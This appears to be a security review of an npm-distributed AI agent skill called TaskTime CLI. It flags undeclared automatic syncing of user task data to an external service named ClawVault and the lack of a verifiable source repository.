TaskTime CLI

The skill name/description align with requiring a tasktime CLI binary and the npm package @versatly/tasktime. However, the description claims automatic integration with ClawVault (an external memory service) but there are no declared environment variables, config paths, or required binaries for authenticating or interacting with ClawVault—this is an unexplained gap.

SKILL.md only instructs use of the tasktime CLI and references a local data file (~/.tasktime/tasks.json), which is expected. It also states that completed tasks are 'Auto-save[d] to ClawVault' on stop, implying automatic transmission of user task data to an external service. The instructions neither document how authentication to ClawVault is obtained nor require or declare the clawvault binary; automatic external sync without describing credential or user consent is a scope concern.

Install is via npm: @versatly/tasktime producing binaries tasktime and tt. npm is a reasonable distribution channel for a CLI, but the skill metadata lacks a homepage or verifiable source repository, increasing uncertainty about the package contents and trustworthiness.

The skill declares no required environment variables or credentials, yet it performs automatic syncs to ClawVault (network exfiltration of task logs). If ClawVault requires authentication, those creds are not declared, which is inconsistent. There is a risk the CLI may read auth tokens from unexpected locations or rely on implicit agent credentials; the metadata should specify what secrets or config are needed.

The skill does not request always:true and only writes to its own path (~/.tasktime/tasks.json), which is reasonable for a CLI timer. The primary privilege concern is the automatic external sync behavior rather than local persistence; the skill does not claim to modify other skills or global agent settings.